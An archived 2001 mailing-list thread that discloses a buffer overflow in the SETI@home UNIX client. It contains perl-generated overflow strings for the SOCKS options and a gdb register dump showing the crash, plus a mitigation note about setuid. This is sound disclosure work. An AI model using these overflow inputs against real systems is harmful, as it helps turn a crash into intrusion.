Nmap Security Scanner
*Intro
*Ref Guide
*Install Guide
*Download
*Changelog
*Book
*Docs
Security Lists
*Nmap Hackers
*Nmap Dev
*Bugtraq
*Full Disclosure
*Pen Test
*Basics
*More
Security Tools
*Pass crackers
*Sniffers
*Vuln Scanners
*Web scanners
*Wireless
*Exploitation
*Packet crafters
*More
Site News
Site Search:
Exploit World
Advertising
About/Contact
Credits
Sponsors:
edgeos



Vulnerability Development: Re: Vulnerability in SETI@home

Re: Vulnerability in SETI@home

From: <dotslash_at_snosoft.com>
Date: Sat, 1 Dec 2001 23:29:10 -0800

Verified on OSX
[dhcp065-024-236-177:~/setiathome-3.03.powerpc-apple.1] elguapo%
./setiathome -socks_passwd `perl -e 'print "A" x 9000'`
Segmentation fault

-KF

On Sunday, December 2, 2001, at 03:15 PM, joetesta_at_hushmail.com wrote:

>
> -----BEGIN PGP SIGNED MESSAGE-----
>
> Vulnerability in SETI_at_home
>
>
>
> Overview
>
> SETI@home (http://setiathome.berkeley.edu/) is a distributed project
> that
> allows ordinary citizens participate in the search for extraterrestrial
> intelligence using their computer's idle time. A buffer overflow exists
> in the UNIX client software.
>
> NOTE: this vulnerability is NOT exploitable in the default
> installation.
>
>
>
> Details
>
> The "i386-pc-linux-gnu-gnulibc2.1" version of the setiathome client (and
> possibly others) is vulnerable to buffer overflow. Example:
>
>
> # ./setiathome -version
> SETI_at_home client.
> Platform: i386-pc-linux-gnu-gnulibc2.1
> Version: 3.03
>
> ...
> ...
>
> # ./setiathome -socks_server `perl -e 'print "A" x 5604;'`
> Segmentation fault
> # ./setiathome -socks_user `perl -e 'print "A" x 5344;'`
> Segmentation fault
> # ./setiathome -socks_passwd `perl -e 'print "A" x 5280;'`
> Segmentation fault
> #
>
> [root_at_seti /home/setiathome]# gdb setiathome
> GNU gdb 5.0rh-5 Red Hat Linux 7.1
> Copyright 2001 Free Software Foundation, Inc.
> GDB is free software, covered by the GNU General Public License, and
> you are
> welcome to change it and/or distribute copies of it under certain
> conditions.
> Type "show copying" to see the conditions.
> There is absolutely no warranty for GDB. Type "show warranty" for
> details.
> This GDB was configured as "i386-redhat-linux"...
> (no debugging symbols found)...
> (gdb) r -socks_server `perl -e 'print "A" x 5604;'`
> Starting program: /home/setiathome/setiathome -socks_server `perl -e
> 'print "A" x 5604;'`
>
> Program received signal SIGSEGV, Segmentation fault.
> 0x2ab4d409 in strcpy () from /lib/libc.so.6
> (gdb) info registers
> eax 0x0 0
> ecx 0x40404040 1077952576
> edx 0x41414141 1094795585
> ebx 0xfefefeff -16843009
> esp 0x7fffe664 0x7fffe664
> ebp 0x7fffe6bc 0x7fffe6bc
> esi 0x7ffffe28 2147483176
> edi 0x807bffd 134725629
> eip 0x2ab4d409 0x2ab4d409
> eflags 0x10246 66118
> cs 0x23 35
> ss 0x2b 43
> ds 0x2b 43
> es 0x2b 43
> fs 0x0 0
> gs 0x0 0
> fctrl 0x37f 895
> fstat 0x0 0
> ftag 0xffff 65535
> fiseg 0x0 0
> fioff 0x0 0
> foseg 0x0 0
> fooff 0x0 0
> fop 0x0 0
>
>
>
> Solution
>
> The SETI_at_home UNIX client is not installed with a setuid bit by default.
> If one was added to it -- perhaps to run it under a 'setiathome'
> account --
> remove it immediately.
>
>
>
> Vendor Status
>
> The project directory, Dr. Dave P. Anderson, was contacted via
> <davea_at_ssl.berkeley.edu> on Monday, Nov 5th. He promptly replied that
> this problem will be fixed in the next release.
>
>
>
>
> - Joe Testa
>
> e-mail: joetesta_at_hushmail.com
> web page: http://hogs.rit.edu/~joet/
> AIM: LordSpankatron
>
>
>
> -----BEGIN PGP SIGNATURE-----
> Version: Hush 2.1
> Note: This signature can be verified at https://www.hushtools.com
>
> wl0EARECAB0FAjwKtmIWHGpvZXRlc3RhQGh1c2htYWlsLmNvbQAKCRA/wHT6vruBNGeO
> AJ9lCce/+Xb91i7BzpWvEiGfnUmBTgCginYcBQJ1WcuQeBC/RDyELpNvKIQ=
> =M4UW
> -----END PGP SIGNATURE-----
>
>
Received on Dec 03 2001

[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]
edgeos